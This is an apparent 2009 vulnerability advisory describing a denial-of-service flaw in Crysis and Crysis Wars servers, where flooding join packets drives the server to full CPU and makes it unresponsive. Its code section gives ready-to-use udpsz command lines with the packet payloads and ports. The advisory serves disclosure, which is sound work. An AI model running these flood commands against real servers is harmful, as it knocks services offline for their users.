####################################################################### Luigi Auriemma Application: Crysis http://www.ea.com/crysis/home.jsp Crysis Wars / Warhead http://crysiswarhead.ea.com Versions: Crysis <= 1.21 Crysis Wars <= 1.5 Platforms: Windows (the Linux server has not been tested but should be vulnerable too) Bug: freezing during join packets flooding Exploitation: remote, versus server Date: 21 Jul 2009 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Crysis is a recent FPS game developed by Crytek (http://www.crytek.com) and released at November 2007. This game is well known for being a "computer killer" due to its high hardware requirements but also for having various problems with cheaters. Crysis Wars instead is a stand-alone multiplayer expansion and sequel also known as Crysis Warhead. ####################################################################### ====== 2) Bug ====== Crysis handles the join packets very badly with the result that is possible to block the game server with a simple flooding of these packets. Practically when a join packet is received are performed some operations over it and derived by it like the verification of the cdkey hash with the Gamespy master server. So after the simple sending of the same join packet (even invalid and incomplete) with a delay of at least 40 milliseconds (depending by the computer and the desired effect on the server) was noticed the increasing of the CPU usage at 100% and, at the same time, the unavailability of the server which started to ignore the incoming packets of the other players or not handling them in time. This is an exagerated behaviour for a game server considering the rate and size of packets and the fact that it's a type of "test" which requires just no skills for being invented and performed (indeed I had doubts in reporting it except when I noticed that my test server seemed down under a light flooding). ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip quick example for Crysis Wars 1.5: udpsz -C 3c00001a49000000010000000100000001000000060000000300000000 -l 10 -S SERVER 64100 -1 quick example for Crysis 1.21: udpsz -C 3c0000180C000000010000000100000001000000060000000300000000 -l 10 -S SERVER 64087 -1 ####################################################################### ====== 4) Fix ====== No fix #######################################################################